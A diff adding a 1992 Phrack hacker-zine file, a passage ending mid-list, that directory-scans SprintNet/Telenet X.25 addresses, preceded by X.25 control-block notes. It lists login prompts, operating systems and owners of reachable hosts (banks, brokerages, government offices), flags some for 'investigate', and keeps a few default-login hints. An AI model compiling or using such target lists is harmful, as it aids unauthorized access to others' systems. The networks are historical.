+        |                            |       |                            |
+        +--CC->>  TRUNK LCNS ----->  |       +--CC->>  CONCENTRATOR LCNS  |
+        |         |LCN0 |LCN1 |...   |       |         |LCN0 |LCN1 |...   |
+        |                            +--->>--+                            |
+        |                                                                 |
+        |   THREE BYTE LCN ENTRY ==> AB CC DD                             |
+        |                             = == ==                             |
+        |                             | |  |                              |
+        |              XCB NUMBER ----+ |  |                              |
+        |              LCN NUMBER ------+  +---- LCN TIMER                |
+        |                                                                 |
+        |                                                                 |
+        +-<<-----------------------------------------------------<<-------+
+
+            **  CC IS THE LCN NUMBER IN XCB B. B IN XCB #0 WILL POINT TO
+                ==                           =  =
+     XCB #4 IN THIS EXAMPLE. CC IN XCB #0 WILL GIVE THE LCN NUMBER USED IN
+                             ==
+     THE LCN VECTOR TABLES FOR XCB #4.
+
+
+     1)   XCB OFFSETS             DEFINITION
+
+           XCB + 09           CONTROL DATA SET SIGNAL STATUS
+                                    BIT  4 = 1  RTS HIGH
+                                         5 = 1  CTS HIGH
+                                         6 = 1 DTR HIGH
+                                         7 = 1 DSR HIGH
+                                    THE S COMMAND RETRIEVES THIS LOC.
+           XCB + 0B              POINTER TO LINE CONFIGURATION RECORD.
+
+           XCB + 0E              NUMBER OF FRAMES DISCARDED.
+           XCB + 0F              NUMBER OF CRC ERRORS
+
+           XCB + 10              NUMBER OF REJECTS SENT
+           XCB + 11              NUMBER OF REJECTS RECEIVED
+
+           XCB + 12              NUMBER OF T1 TIMEOUT
+
+           XCB + 13              NUMBER OF COMMAND REJECTS SENT
+           XCB + 14              NUMBER OF COMMAND REJECTS RECEIVED
+
+           XCB + 15              NUMBER OF DISCONNECTS SENT
+           XCB + 16              NUMBER OF DISCONNECTS RECEIVED
+
+           XCB + 17              NUMBER OF SET MODE SENT
+           XCB + 18              NUMBER OF SET MODE RECEIVED
+
+           XCB + 19              NUMBER OF FRAME OVERFLOW
+
+           XCB + 1A              NUMBER OF I FRAMES SENT
+           XCB + 1C              NUMBER OF I FRAMES RECEIVED
+
+           XCB + 24              FLAG BYTE
+                                  BIT 0 = 1   DCE-TO-DTE FLOW INIT
+                                      1 = 1   DTE-TO-DCE FLOW INIT
+                                      2 = 1   LINK RESET (DISC. OR SETMODE SENT
+                                      3 = 1   DCE BUSY ( RNR SENT)
+                                      4 = 1   IN TIMER RECOVERY
+                                      5 = 1   SENT INTERNAL RESET. LAP RE-INIT.
+                                      6 = 1   SET POLL BIT IN NEXT FRAME.
+
+           XCB + 27              LINE STATUS
+                                 BIT 0 = 1  NOT ACTIVE
+                                     1 = 1  DEACTIVATED
+                                     2 = 1  BUSY-OUT
+                                     3 = 1  ACTIVATING
+                                     4 = 1  ACTIVE
+                                     5 = 1  DEACTIVATING
+
+           XCB + 2B              MAX. LCN PERMITTED
+           XCB + 2C              CURRENT NUMBER OF LCN IN USE
+           XCB + 2D              POINTER TO THE LCN VECTOR TABLE
+
+           XCB + 47              'DISABLE/ ENABLE/ CLEAR COMMAND.
+                                     NOT OPERATIONAL AT VERSION 1.01.
+                                   01 - BUSY
+                                   02 - CLEAR BUSY
+                                   04 - RESET LINE
+
+     2)   LCN VECTOR TABLE.
+            ( XCB + 2D ,L,A (LCN ADDRESS),R3)
+                    LCN ADDRESS = (LCN * 3)
+
+           LCN + 0               BITS
+                                 0-3 - XCB DIRECTORY NUMBER.
+                                 4   - INIT CLEAR TIMER ON
+                                 5   - CLEAR INDICATION SENT
+                                 6   - CALL REQUEST SENT
+                                 7   - LCN ACTIVE
+           LCN + 1               LCN NUMBER
+                                  (SEE LCN + 0 , BITS 0-3 TO GET XCB NUMBER)
+           LCN + 2               TIMER FOR LCN.
diff --git a/phrack42/8.txt b/phrack42/8.txt
new file mode 100644
index 0000000..7fce50a
--- /dev/null
+++ b/phrack42/8.txt
@@ -0,0 +1,1533 @@
+                             ==Phrack Magazine==
+
+                  Volume Four, Issue Forty-Two, File 8 of 14
+
+                        The SprintNet/Telenet Directory
+ 
+                                      ===
+                                    =======
+                                  ===========
+                                ===============
+                           ---------------------===========
+                        ------------------=============
+                     ---------------=================
+                  ------------===================
+                                ===============
+                                  ===========
+                                    =======
+                                      ===
+ 
+ 
+ 
+Scanned and written by Skylar
+Release date:  12/92
+ 
+Part I   Basic SprintNet Info
+Part II  SprintNet Directory
+ 
+ 
+ 
+ 
+How to Access SprintNet:
+~~~~~~~~~~~~~~~~~~~~~~~~
+(Compliments of Sprint)
+ 
+ 
+                         SPRINTNET LOCAL ACCESS NUMBERS
+ 
+     FOR THE MOST UP-TO-DATE LISTING OF THE U.S. ACCESS TELEPHONE NUMBERS
+     FOR PC OUTDIAL SERVICES, DO THE FOLLOWING:
+ 
+     1.  USE A MODEM TO DIAL 1-800-546-1000 WITH PARAMETERS SET AT 7-E-1
+
+     2.  TYPE THREE CARRIAGE RETURNS (CR) (CR) (CR)
+
+     3.  INPUT YOUR AREA CODE AND LOCAL EXCHANGE
+
+     4.  YOU WILL THEN RECEIVE THE PROMPT  SIGN "@"
+
+     5.  THEN, TYPE:
+                    MAIL (CR)
+                    USER NAME: PHONES (CR)
+                    PASSWORD: PHONES  (CR)
+ 
+Follow the menus to get your local dialup, then logon through that using the
+same procedure until you get to the "@" prompt.  From here, you can type in
+commands.  Below is a list of commands available from the "@" prompt.
+ 
+Notes:  while connected, you can escape to the command prompt by sending
+        <cr>@<cr>
+        while waiting for a connection, you can escape to the command prompt by
+        sending a hard BREAK
+ 
+Command <parameter>  Explanation
+ 
+BYE                  Closes session (same as disconnect)
+CONNECT <nua>        Connects to a network user address
+CONTINUE             Continue session (used after breaking)
+DISCONNECT           Closes session (same as bye)
+DTAPE                Builds optimum circuit for bulk file transfer
+DISABLE ECHO
+DISABLE FLOW         Pad to host flow control
+DISABLE TFLOW        Terminal to pad flow control
+ENABLE ECHO
+ENABLE FLOW
+ENABLE TFLOW
+FULL                 Set full duplex
+HALF                 Set half duplex
+HANGUP               Self explanitory
+ID <nui>             Sets the network user id for charged calls
+RESET                Resets your port (as if you just dialed up)
+RST                  Show remote parameters
+RST?                 Set remote parameters
+PAR?                 Show ITI parameters
+STATUS               Shows your current network address and port
+SET? <param>:<value> Set ITI parameters. 
+TERM <termtype>      Set your termtype 
+TEST CHAR            Test of all ascii characters
+TEST ECHO            Echos what you type
+TEST TRIANGLE        
+TEST VERSION         Shows current pad software ver
+ 
+Note:  I didn't include any of the parameters for SET? or termtypes because
+       they would have increased the length of this file by about 20%.  If you
+       want these, you can get them from the PC-PURSUIT BBS file section via
+       C PURSUIT from SprintNet or 031109090063100 international.
+ 
+ 
+ 
+Network Messages:
+~~~~~~~~~~~~~~~~~
+While attempting to CONNECT to addresses on SprintNet, you may run into various
+messages from the network.  This should help you determine what they mean.
+ 
+ 
+If you are connected and break your connection or are disconnected by the
+remote host, you will recieve a disconnect message.  Below is a breakdown of
+the message.
+ 
+DISCONNECTED 00 00 00:00:00:00 000 00
+             ^  ^  ^_________^  ^  ^
+             |  |       |       |  |
+             |  |       |       |  +-- Packets sent
+             |  |       |       +----- Packets recieved
+             |  |       +------------- Days:Hours:Minutes:Seconds connected
+             |  +--------------------- Clearing diagnostic code
+             +------------------------ Clearing cause code
+   
+ 
+If you are unable to make a connection or abort an attempted connection, you
+will only receive cause and diagnostic codes (as no time was spent connected
+and obviously no packets were sent!) along with a very general plain-text of
+what the problem might be (i.e. rejecting, not operating...).  Below is a list
+of cause and diagnostic codes to give you a more detailed idea of why you were
+unable to connect or why you were disconnected.
+ 
+ 
+  Clear cause codes:
+ 
+ 0   "DTE originated clear"
+ 1   "Number busy"
+ 3   "Invalid facility requested"
+ 5   "Network congestion"
+ 9   "Out of Order"
+ 11  "Access barred"
+ 13  "Not obtainable"
+ 17  "Remote Procedure Error"
+ 19  "Local Procedure error"
+ 21  "RPOA out of order"
+ 25  "Reverse Charge not Subscribed to"
+ 33  "Incompatible destination"
+ 41  "Fast Select acceptance not subscribed"
+ 49  "Ship absent"
+ 128 "DTE originated clear with top bit set"
+ 193 "Gateway procedural error"
+ 195 "Gateway congestion"
+ 199 "Gateway Operational"
+ 
+ 
+ Clear diagnostic codes
+
+ 0   "No additional Information"
+ 1   "Invalid Ps"
+ 2   "Invalid Pr"
+ 16  "Packet Type Invalid"
+ 17  "Packet Type Invalid in state r1"
+ 18  "Packet Type Invalid in state r2"
+ 19  "Packet Type Invalid in state r3"
+ 20  "Packet Type Invalid in state p1"
+ 21  "Packet Type Invalid in state p2"
+ 22  "Packet Type Invalid in state p3"
+ 23  "Packet Type Invalid in state p4"
+ 24  "Packet Type Invalid in state p5"
+ 25  "Packet Type Invalid in state p6"
+ 26  "Packet Type Invalid in state p7"
+ 27  "Packet Type Invalid in state d1"
+ 28  "Packet Type Invalid in state d2"
+ 29  "Packet Type Invalid in state d3"
+ 32  "Packet not allowed"
+ 33  "Packet Type Unidentifiable"
+ 34  "Call on One way LC"
+ 35  "Invalid PVC packet type"
+ 36  "Packet on Unassigned logical channel"
+ 37  "Reject not Subscribed to"
+ 38  "Packet too short"
+ 39  "Packet too long"
+ 40  "Invalid GFI"
+ 41  "Restart/Registration Packet has LC"
+ 42  "Packet type not compatible with Facility"
+ 43  "Unauthorised Interrupt Confirmation"
+ 44  "Unauthorised Interrupt"
+ 45  "Unauthorised Reject"
+ 48  "Timer expired"
+ 49  "Timer expired for Incoming call"
+ 50  "Timer expired for clear Indication"
+ 51  "Timer expired for reset indication"
+ 52  "Timer expired for restart indication"
+ 53  "Timer expired for call forwarding"
+ 64  "Call set up/clear/registration problem"
+ 65  "Facility/registration code not allowed"
+ 66  "Facility parameter not allowed"
+ 67  "Invalid Called Address"
+ 68  "Invalid calling address"
+ 69  "Invalid facility registration length"
+ 70  "Incoming call barred"
+ 71  "No logical channel available"
+ 72  "Call Collision"
+ 73  "Duplicate facility ested"
+ 74  "Non zero address length"
+ 75  "Non zero facility length"
+ 76  "Facility not provided when expected"
+ 77  "Invalid CCITT spec'd facility"
+ 78  "Maximum call redirections/forwardings exceeded"
+ 80  "Miscellaneous"
+ 81  "Improper cause code from DTE"
+ 82  "Non alligned octet"
+ 83  "Inconsistent Q bit setting"
+ 84  "NUI Related problem"
+ 96  "International setup/clearing problem"
+ 97  "Unknown calling DNIC "
+ 98  "TNIC mismatch "
+ 99  "Call identifier mismatch"
+ 100 "Neg' error in utility parm' value"
+ 101 "Invalid utility length "
+ 102 "Non-zero utility length "
+ 103 "M bit violation "
+ 112 "International problem "
+ 113 "Remote Network problem "
+ 114 "International Protocol problem "
+ 115 "International Link out of order "
+ 116 "International Link busy"
+ 117 "Transit Network Facility Problem"
+ 118 "Remote Network Facility Problem"
+ 119 "International routing problem"
+ 120 "Temporary routing problem"
+ 121 "Unknown called DNIC"
+ 122 "MAintenance action"
+ 128 "Network Specific Diagnostic"
+ 218 "trax_trap error for user call"
+ 219 "user task error"
+ 220 "x25 task error"
+ 
+            
+Note:  If you're getting LOCAL/REMOTE PROCEDURE ERROR or REJECTING, try using
+       different ports with the same address.
+ 
+ 
+Other Than SprintNet:
+~~~~~~~~~~~~~~~~~~~~~
+International or other than SprintNet users, follow the table below to expand
+these addresses to suit your network:
+ 
+      202  224      <--- Address from list  
+ 
+ 031102020022400    <--- Translated to international format      
+ 
+ 
+03110 202 00224 00  <--- Explanation of international format  
+^^^^^ ^^^ ^^^^^ ^^
+  |    |    |    |
+  |    |    |    |____ Port Number
+  |    |    |_________ Network Address
+  |    |______________ Network Prefix
+  |___________________ DNIC
+ 
+ 
+ 
+ DNIC  : This will be be 03110 for all translations.  On some networks, you
+         won't need the leading 0 and can use 3110, and a few networks
+         (DataPac?) use a 1 instead of 0, thus:  13110.
+ 
+ 
+Prefix : Throughout this file, it will always be a three digit prefix.
+         
+ 
+Address: You may have to experiment a little to get the correct place holders,
+         but as a general rule they will translate like this:
+
+             1  = 00001
+            11  = 00011
+           111  = 00111
+          1111  = 01111          
+         11111  = 11111
+         
+ 
+Ports  : Port numbers range from .1 to .99.  The first 27 ports may be
+         alternately displayed as A-Z.  Ports are generally not listed as most
+         addresses will find a free port for you if you leave it off, but in
+         some cases you must use it, so they translate like this:
+
+         .1 or A = 01
+         .2 or B = 02
+         and so on...
+ 
+
+ 
+Examples of translated addresses:
+      
+      201 1.5  = 031102010000105     
+      415 9    = 031104150000900
+      223 25   = 031102230002500
+      714 218  = 031107140021800
+      617 2027 = 031106170202700
+ 
+ 
+If this seems a bit essoteric or confusing, don't worry.  A little bit of
+experimenting will get you on the right track.
+ 
+ 
+Notes: 
+~~~~~~
+- You can usually omit leading and trailing 0's 
+- Most networks and PADs do NOT allow any spaces
+- From SprintNet, you can use either form of address
+ 
+
+ 
+Conventions in this list: 
+~~~~~~~~~~~~~~~~~~~~~~~~~
+Addresses followed by a "$" do not accept collect connections (if you're not
+coming on from SprintNet, ignore the $).
+ 
+Addresses followed by a "*" do not accept collect connections, and I was unable
+to connect to them to determine what they are.
+                                                                                
+When both the OS and the RESPONSE fields are left blank, this means that I
+connected and either couldn't evoke response or got a garbage response.
+  
+LOGIN/PW's removed from this release.
+ 
+ 
+ 
+                              SprintNet Directory
+                              ~~~~~~~~~~~~~~~~~~~
+
+201 - New Jersey  Scanned:[0-2000]      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- -------------------------------------------------
+201 1    $             outdial (201)
+201 22   $             outdial (201)
+201 25     Unix        HP-UX ciathp A.B7.00 U 9000/835
+201 30 
+201 32                 D&B Terminal
+201 34   $ Prime
+201 36   *             (incoming call barred) 
+201 37   $
+201 40   $             Welcome to our PSI via X.29 
+201 42   *
+201 43   $
+201 44   $
+201 45     Prime       NewsNet
+201 46   $
+201 48   $ VAX/VMS     Welcome to MicroVMS V5.3
+201 49   $ VAX/VMS
+201 53                 WELCOME TO COLGATE'S IICS
+201 57   *             (incoming call barred)
+201 58   *             (incoming call barred)
+201 59   *             (incoming call barred)
+201 66   $ Prime
+201 67                 warner computer systems
+201 68                 warner computer systems 
+201 69                 warner computer systems 
+201 83                 ENTER ID:
+201 84                 D&B Terminal
+201 86                 D&B Terminal
+201 88                 D&B Terminal
+201 89                 Prudential
+201 107  $             outdial (201)
+201 108  $             outdial (201)
+201 138    HP-3000     EXPECTED HELLO, :JOB, :DATA, OR (CMD) AS LOGON.
+201 140  $             Enter One Time Password: 
+201 156    Unix        Securities Data Company (SDC7) 
+201 163                VU/TEXT * PLEASE SIGN ON: 
+201 164                VU/TEXT * PLEASE SIGN ON:
+201 167    DTC         DTC01.HP.COM
+201 170                Prudential
+201 173                MHP201A UPK19130 APPLICATION:
+201 174    CRYPTO      ENTER "IDX" OR "ID" AND USER ID -->
+201 179                APPLICATION: 
+201 200                D&B Terminal
+201 201                D&B Terminal
+201 235  *
+201 241  $             (immediate hangup)
+201 242                D&B Terminal
+201 243                D&B Terminal
+201 244                D&B Terminal
+201 246                D&B Terminal
+201 247    VTAM        Shearson Lehman Brothers NPSI 
+201 252    Prime       PRIMENET 21.0.6 BOR 
+201 254  $ Unix        field login:                                 
+201 257                Please press <Return> . . .(
+201 259                Please press <Return> . . .(
+201 271  $             User Access Verification   Password:
+201 301  $             outdial
+201 334  $ HP-3000     :
+201 335  *
+201 336  $             Concurrent Computer Corporation's DATALINK
+201 337  $             out of order
+201 339  $ ???         (echo)
+201 340  *
+201 341  *
+201 342  $ Unix        ocpt
+201 343  $             Enviornmental Control Monitor (PENNET)
+201 344  *
+201 348  *
+201 350  $             $$ 4200 MODEL: $$ 50 DEVICE TYPE IDENTIFIER :
+201 355  $             Concurrent Computer Corporation's DATALINK
+201 430  *             (incoming call barred)
+201 465    VAX/VMS     V5.5      on VBH301
+201 471                Prudential
+201 472                APPLICATION: 
+201 474                Prudential
+201 475                Prudential
+201 477    VM/CMS?     ENTER AS SHOWN: L/LOGON/TSO/INFO/CICS
+201 479    VM/CMS
+201 730  *
+201 770  *
+201 830  $             INSCI/90 SYSTEM MV-10/13, LOGON PLEASE
+201 870  $             INSCI/90 SYSTEM MV-10/13, LOGON PLEASE
+201 890  $             INSCI/90 SYSTEM MV-10/13, LOGON PLEASE
+201 895  $             INSCI/90 SYSTEM MV-10/10, LOGON PLEASE
+201 899  $             (hangs up)
+201 910  $             (echo)
+201 912  $             (echo)
+201 914  $             (echo)
+201 916  $             (echo)
+201 950                Bankers Trust Online
+201 999  $             (hangs up)
+201 1030               USER ID 
+201 1050               VU/TEXT 
+201 1051               VU/TEXT
+201 1052               VU/TEXT
+201 1053               VU/TEXT
+201 1054               VU/TEXT
+201 1055               VU/TEXT
+201 1056               VU/TEXT 
+201 1057               VU/TEXT
+201 1059               VU/TEXT
+201 1060               VU/TEXT
+201 1061               VU/TEXT
+201 1062               VU/TEXT
+201 1063               VU/TEXT
+201 1064               VU/TEXT
+201 1065               VU/TEXT 
+201 1066               VU/TEXT
+201 1067               VU/TEXT
+201 1068               VU/TEXT
+201 1069               VU/TEXT
+201 1070               VU/TEXT
+201 1071               VU/TEXT
+201 1072               VU/TEXT
+201 1073               VU/TEXT
+201 1074               VU/TEXT
+201 1075               VU/TEXT 
+201 1076               VU/TEXT 
+201 1077               VU/TEXT 
+201 1078               VU/TEXT
+201 1079               VU/TEXT 
+201 1135 $             ACCESS BARRED
+201 1137 $             Finlay Fine Jewelry Corp. 
+201 1139               CONNECTED TO PACKET/400
+201 1143 $             MHP201A UPK19040  APPLICATION:
+201 1156 *
+201 1160               Shaw Data Services
+201 1163 *             (incoming call barred)
+201 1164 *             (incoming call barred)
+201 1168               CONNECTED TO PACKET/400
+201 1170.1 $           Johnson and Johnson Network
+201 1171 *
+201 1172 $ Unix/SCO    TCSS
+201 1173 *
+201 1174 *
+201 1176               NSP READY
+201 1177               NSP READY
+201 1232   VAX/VMS     Username: 
+201 1233   VAX/VMS     Username: 
+201 1243   VAX/VMS     Friden Neopost  (NJCRAN Node)
+201 1251   VM/CMS      GSERV
+201 1258   VM/CMS      GSERV
+201 1259   VM/CMS      GSERV
+201 1263 *             (incoming call barred)
+201 1264 *             (incoming call barred)
+201 1265 *
+201 1266 *
+201 1267 *
+201 1268 *
+201 1270 
+201 1272 
+201 1275   VAX/VMS     Shaw Data Services
+201 1277
+201 1330 *
+201 1331 *
+201 1332 *
+201 1333 $             (echo)
+201 1335 $             Environment Control Monitor 
+201 1340 *
+201 1341 *
+201 1342 *
+201 1343               Prudential
+201 1344               Prudential
+201 1345               Prudential
+201 1346               Prudential
+201 1347               Prudential
+201 1354 *
+201 1359 $             Finlay Fine Jewelry Corp.
+201 1370.1 $ HP-3000   CORPHP.CIS.HCC                           
+201 1371 *
+201 1372 *
+201 1373 *
+201 1374 *
+201 1375 *
+201 1376 *
+201 1377 *
+201 1378 *
+201 1379 $
+201 1430 *             (incoming call barred) 
+201 1431 *             (incoming call barred)
+201 1432 *             (incoming call barred)
+201 1433 *             (incoming call barred)
+201 1434 *             (incoming call barred)
+201 1435 *             (incoming call barred)
+201 1442 *
+201 1443 *
+201 1446 *
+201 1454 *
+201 1455 *
+201 1456 *
+201 1460 
+201 1510 
+201 2030               Lynx Technologies Inc.
+201 2031   VTAM        Shearson Lehman Brothers NPSI  
+201 11234  VAX/VMS  
+ 
+ 
+ 
+202  -  Washington D.C.  Scanned: [0 - 3000] & various
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- -------------------------------------------------
+202 1      Prime
+202 2      Prime
+202 10     Prime
+202 12     Prime
+202 31                 NewsMachine 5.1                        
+202 36   $             NETWORK SIGN-ON FAILED     
+202 38   $             NETWORK SIGN-ON FAILED
+202 42   *
+202 48   $             U.S.I.A. Computer Center.  
+202 49                 enter system id -- 
+202 115  $             outdial (202)      
+202 116  $             outdial (202)
+202 117  $             outdial (202)
+202 123  $             xxxx 
+202 138  $ VAX/VMS     Gaullaudet University
+202 141 >909 761       User name?
+202 142 >909 406       User name?  
+202 149  $
+202 150                UPI>
+202 152  *
+202 201                CompuServe  User ID: phones
+202 202                CompuServe
+202 203                CompuServe
+202 224  $             outdial (global)
+202 235  $ Prime
+202 239  $ Prime
+202 241  *
+202 243  *
+202 245    AOS         Username: 
+202 253  *
+202 255                Morgan Stanley Network
+202 260  $             PLEASE SELECT: TSOMVS, ANOTHER APPLICATION
+202 265  $             USER ID
+202 266  $             USER ID
+202 275  *
+202 276  *
+202 277  *
+202 278  $             USER ID
+202 330  *
+202 331  *
+202 332  *
+202 333  *
+202 334  *
+202 335  *
+202 336    VAX/VMS     Congressional Quarterly Online Systems
+202 337    VAX/VMS     Congressional Quarterly Online Systems
+202 353  *
+202 356    PRIME       PRIMENET 22.1.1.R36 SYSA  
+202 361  *
+202 362  *
+202 363  *
+202 364  *
+202 365                Lexis and Nexis
+202 366                Lexis and Nexis
+202 367                Lexis and Nexis
+202 371  *
+202 372  *
+202 373  *
+202 377  *
+202 390  $             #CONNECT REQUESTED TO HOST GSAHOST : CANDE
+202 391  $             #CONNECT REQUESTED TO HOST GSAHOST : CANDE
+202 403  $             outdial (202) 
+202 433  *
+202 453                USER ID
+202 454    VAX/VMS     Connect to GBS     
+202 455  *
+202 456  *
+202 458  *
+202 459  *
+202 465  *
+202 466  *
+202 467  *
+202 468  *
+202 469  *
+202 472  *
+202 477                UPI>
+202 478                UPI>
+202 479                UPI>
+202 550                UPI>
+202 616  *
+202 617  *
+202 1030 *
+202 1031 *
+202 1032 *
+202 1033 *
+202 1034 *
+202 1155 *
+202 1156 *
+202 1157 *
+202 1158 *
+202 1159 *
+202 1261 *
+202 1262 *
+202 1263 *
+202 1264 *
+202 1265 *
+202 1266 *
+202 1267 *
+202 1268 *
+202 1269 *
+202 1270 *
+202 1323 $
+202 1325   VAX/VMS
+202 1363               Enter your User Name:
+202 1364.1 Unix        System name: fmis             
+202 1365.3 Unix/SysV   X.29 Terminal Service (person)
+202 1385   Prime       PRIMENET 22.1.3 CGYARD
+202 1407   Unix/SysV   X.29 Terminal Service (person)
+202 1440   VAX/VMS     Username:
+202 3011 *
+202 3012 *
+202 3030A              ASYNC TO 3270 -> FIRST AMERICAN BANK OF GEORGIA 
+202 3036 $ GS/1        GS/X.25 Gateway Server
+202 3060 *
+202 3067 $ Major BBS   Power Exchange (adult bbs and chat)  Member-ID? new
+202 3069 $             E06A26B3
+202 3070 $             
+202 3071 $
+202 3072 $
+202 3074 $ VAX/VMS     Welcome to VAX/VMS V5.5-1 
+202 3075 *
+202 3130               GTE Contel DUAT System       (login as visitor)
+202 3131               GTE Contel DUAT System       (airplane info galore)
+202 3134               USER ID 
+202 3135               USER ID 
+202 3138 *
+202 3139 *
+202 3140 *
+202 3142 *
+202 3145               &StArT&
+202 3242   VOS         Please login  (try 'help')
+202 3243   VOS         Please login
+202 3244   Unix        tmn!login:
+202 3246 *
+202 3247 *
+202 3254   VOS         Please login 
+202 3255   VOS         Please login 
+202 3256   VOS         Please login 
+202 3257               (locks up)
+202 3258   VOS         Please login
+202 3259   VOS         Please login
+202 3260   VOS         Please login
+202 3261   VOS         Please login 
+202 3262   VOS         Please login
+202 3263   VOS         Please login
+202 3264 $             AMS SYSTEM= 
+202 3269
+202 3330 *
+202 3332 *
+202 3333 *
+202 3335 $             NETX A000VD00 READY FOR LOGON
+202 3336 $             NETX A000VD00 READY FOR LOGON
+202 3337 *
+202 3338 *
+202 3600 *
+202 3601 *
+202 3602 *
+202 3603 *
+202 3604 *
+202 3605 *
+202 3606 *
+202 3611 *
+202 3612 *
+202 3613 *
+202 3614 *
+202 3630 *
+202 4220 
+202 4222
+202 4226               MSG10-RJRT TERMINAL-ID:GSSCXA63 IS NOW IN SESSION
+202 60031  VAX/VMS     V5.4-2  
+202 60033  Unix/SunOS  Welcome to QHDS!
+202 60035 *            
+202 60036              NETX A0A0VD00 READY FOR LOGON
+202 60039  Unix/SunOS  (QHDS.MXBC)
+202 60040              Lexis and Nexis
+202 60043 *
+202 60056
+202 60058 *
+202 60059 *
+202 60060 *
+202 60064 *
+202 60068              PIN: 
+202 60069              PIN:
+202 60070              PIN: 
+202 60071              PIN: 
+202 60073 *
+ 
+ 
+ 
+ 
+203  -  Connecticut  Scanned: [0 - 500]
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- -------------------------------------------------
+203 22     VM/CMS
+203 28     VM/CMS
+203 50                  CONNECTED TO PACKET/74
+203 60   $              GEN*NET Private Switched Data Network
+203 61   *
+203 62     VAX/VMS ACM  Enter SecurID PASSCODE: 
+203 66                  Login Please :
+203 67                  Login Please : 
+203 77   *
+203 78   $ Novell       Netware Access Server (DDS)
+203 79   *
+203 105  $              outdial (203)
+203 120  $              outdial (203)
+203 121  $              outdial (203)
+203 136    PRIME        PRIMENET 20.2.7 SYSA  
+203 159  $              access barred
+203 160  *
+203 161  $ Novell       Netware Access Server (INFOSYS)
+203 165                 Panoramic, Inc. PLEASE LOGON: help
+203 242                 Login Please : 
+203 274  $ ACF/VTAM      
+203 277  *              (incoming call barred)
+203 310
+203 317 
+203 346  *
+203 347                 SB > 
+203 350  *
+203 362  *              (incoming call barred)
+203 367                 CONNECTED TO PACKET/74
+203 434  $              (hangs up)
+203 435  $ ACF/VTAM
+203 438  $              (echo)
+203 442  $              (echo)
+203 452  *
+203 455 
+203 458  *              (incoming call barred)
+203 463  *
+203 465  *
+ 
+ 
+ 
+ 
+205  -  Alabama  Scanned: 0 - 300     
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- -------------------------------------------------
+205 237  *
+205 245  *
+205 246  *
+ 
+ 
+ 
+ 
+206  -  Washington  Scanned: [0 - 500]
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- -------------------------------------------------
+206 40   $ Prime       PRIMENET 23.2.0.r26 P6450 
+206 60   *
+206 65     PRIME       PRIMENET 22.1.4 OAD   
+206 66 
+206 67   $ 
+206 138  $             MHP201A UPK0BY60  * VERSION 5.5.4 *. 
+206 139  $             Wang VS Logon 
+206 154  $ DTC         THE SEATTLE DTC (DTC01.MACON.USOPM)
+206 158    VAX/VMS     Username:        
+206 167  *             (incoming call barred)
+206 170  $ hp-3000
+206 173  $             Renex Connect, SN-00100201
+206 205  $             outdial (206)
+206 206  $             outdial (206)
+206 208  $             outdial (206)
+206 239.1$             + Log on please
+206 240.1$             ***investigate***
+206 250  $             logins to this workstation temp. barred
+206 251  $ Wang        SYSTEM TWO (TACOMA:TACOMA)
+206 351  *
+206 352  *
+206 357  $ HP-3000
+206 360                CUSTOMER ID: 
+206 368  *
+206 369  *
+206 371  $
+206 375    Prime       PRIMENET 23.2.0.r26 DZ-BLV
+206 430  $             911 Monitor HATSLNCT is currently not available
+206 470    VAX/VMS
+206 479  $             + Log on please
+ 
+ 
+ 
+ 
+207  -  Maine  Scanned: 0 - 300      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- -------------------------------------------------
+207 40   *
+207 260    ???         Please login:
+ 
+ 
+ 
+ 
+208  -  Idaho  Scanned: 0 - 300      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- -------------------------------------------------
+208 236  *
+208 250  $             USER ID
+208 252                Welcome to the NET, X.29 Password: 
+ 
+ 
+ 
+ 
+209  -  California  Scanned: 0 - 300      
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- -------------------------------------------------
+209 241  *
+209 243  *
+209 245  *
+209 246  *
+209 270  $ VAX/VMS     Continental PET Technologies, MODESTO  
+209 273    DACS III    ***investigate***
+ 
+ 
+ 
+ 
+211  -  Dun & Broadstreet  Scanned: various
+ 
+ADDRESS    OS/SYSTEM   PROMPT/RESPONSE/OWNER/ETC              LOGIN/PW
+---------- ----------- -------------------------------------------------
+211 1140               D&B terminal
+211 1142               D&B terminal
+211 1145   VAX/VMS     on VBH302
+211 1240               Please enter your terminal id; '?' for MENU
+211 1242               D&B terminal
+211 1244               Please enter your terminal id; '?' for MENU
+211 1245   ???         GNETMAIL                  
+211 2150   Prime       
+211 2240               DunsNet's User Verification Service 
+211 2247               DUNSCENTER  (connects to many machines)
+211 2249               ID?> 
+211 2255               ID?> 
+211 2450   Prime       
+211 2451   Prime
+211 3290   CMS?        IDC/370 Ready-
+211 3291   CMS?        IDC/370 Ready-
+211 3292   CMS?        IDC/370 Ready-
+211 3390   CMS?        IDC/370 Ready-
+211 3391   CMS?        IDC/370 Ready-
+211 3392   CMS?        IDC/370 Ready-
+211 3490   CMS?        IDC/370 Ready-
+211 4190               DunsNet's User Verification Service 
+211 4240               Enter service code -     
+211 4241               Enter service code -   
+211 5140   DTC         Nielsen Household Services (DTC03.NY.NPD)
+211 5240   VAX/VMS     GUMBY...
+211 5290   DTC         Nielsen Household Services (DTC02.NY.NPD)
+211 6140               PLEASE ENTER SUBSCRIBERID;PASSWORD
+211 6141               A. C. Nielsen Information Center.
+211 6142               A. C. Nielsen Information Center.
+211 6145
+211 6190               PLEASE ENTER SUBSCRIBERID;PASSWORD
+211 6240               A. C. Nielsen Information Center.
+211 6250   ???         USERNAME? 
+211 6290               PLEASE ENTER SUBSCRIBERID;PASSWORD
+211 8140               DIALOG INFORMATION SERVICES
+211 8142   VAX/VMS     Username:
+211 11140  VM/CMS      VM/370 ONLINE--        
+211 11142  VM/CMS      VM/370 ONLINE--        
+211 11144  VAX/VMS     Username:
+211 13190              D&B terminal (in spanish)
+211 13191              D&B terminal
+211 14110              Renex Connect, Enter password -     
